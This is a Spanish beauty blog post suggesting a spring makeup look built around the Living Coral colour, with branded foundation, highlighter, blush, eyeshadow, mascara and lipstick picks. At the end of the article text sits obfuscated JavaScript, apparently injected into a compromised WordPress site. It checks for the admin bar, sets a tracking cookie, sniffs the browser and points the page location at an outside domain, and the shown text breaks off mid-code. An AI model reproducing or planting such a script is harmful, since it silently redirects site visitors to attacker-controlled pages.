Ya sabemos que el color de este año es el precioso Living Coral, así que vamos a proponer diferentes ideas y consejos teniendo a este color muy en cuenta. Además de ser súper vivo y alegre, da un toque de luz a la cara y muestra lo mejor de nosotras. ¿Te animas a llevarlo?

 

El look ideal

La parte más visible del cuerpo, la cara, es protagonista de la mayor parte del maquillaje que nos aplicamos cada día. Y es que con simples gestos, como un toque de labial, cambiamos casi radicalmente. Vamos a proponer un maquillaje súper sencillo pero a la vez completo, que te dará un toque natural a la par que elegante y estarás preparada para cualquier ocasión.

maquillajeprimavera

 

Rostro:

Comenzamos con una base de maquillaje cubriente e hidratante. Nosotros te proponemos Synchro Skin Glow de Shiseido, disponible en 8 tonos y que cuenta con la Tecnología de Respuesta Sensorial, reconoce los cambios de tu piel y se adapta a ella. Una vez aplicada con movimientos suaves pero dejándola unificada y con la sensación visible de que no la tienes aplicada, utilizaremos el iluminador para dar un toque extra de luz. Radiance in a Flash de Guerlain es una buena opción, ya que deja la piel tersa y radiante en cuestión de minutos.

Otra alternativa es utilizar un producto 2 en 1, es decir, que sea por una parte iluminador y por otra colorete, como Duo Iluminador & Colorete de Clarins. Ya sabemos que el colorete se debe aplicar desde el pómulo hasta la sien, con una brocha de un tamaño adecuado para tu cara, ni grande ni pequeña, para no tener que realizar demasiadas pasadas por la cara. Una de las opciones más interesantes que hemos encontrado es Daiya Fude Brush de Shiseido, una brocha que puede utilizarse tanto con fórmulas fluidas como cushion, crema y/o polvo. Basándonos en el color coral, un colorete que nos encanta es L’Orchidée de Sisley, que deja un acabado que potencia la belleza natural de la piel.

 

maquillajeprimavera

Ojos:
De toda la cara, los ojos suelen ser uno de los principales protagonistas que toda mujer siempre desea potenciar, ya que cualquier gesto hace que el rostro cambie totalmente. Siguiendo el tono coral, rosáceo y pasteles, 5 Couleurs Lolli’ Glow de Dior es una apuesta segura que deberías tener, ya que proporciona un acabado dulce y azucarado para celebrar la llegada de la primavera. Como buena experta que eres, sabes que nunca puede faltar en tu neceser una buena máscara de pestañas, ya que si no es como si algo faltara. Y es que unas pestañas bien largas, con volumen y separadas son ingredientes esenciales en toda máscara que se precie, por lo que Lash Volumiser 38º de Sensai es una de las mejores opciones si quieres conseguir todos esos efectos.

maquillajeprimavera

 

Labios: 

Llegando al toque final de nuestro maquillaje primaveral, la guinda del pastel la proporciona la reina de la fiesta, la barra de labios. Cualquier tono sería gran opción, pero si queremos duración, brillo, color e hidratación, cuenta con Dior Addict Stellar Shine de Dior, bonita por fuera y preciosa por dentro, ya que además puedes elegir entre 24 tonos diferentes. ¿Con cuál te quedarías?

Diseño sin título (45)

 

Ya tienes el maquillaje ideal ¿qué plan elegirías para ir así de guapa? var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m

¿Te ha gustado? ¡Compártelo!Share on FacebookTweet about this on TwitterPin on PinterestShare on LinkedInShare on Google+Email this to someone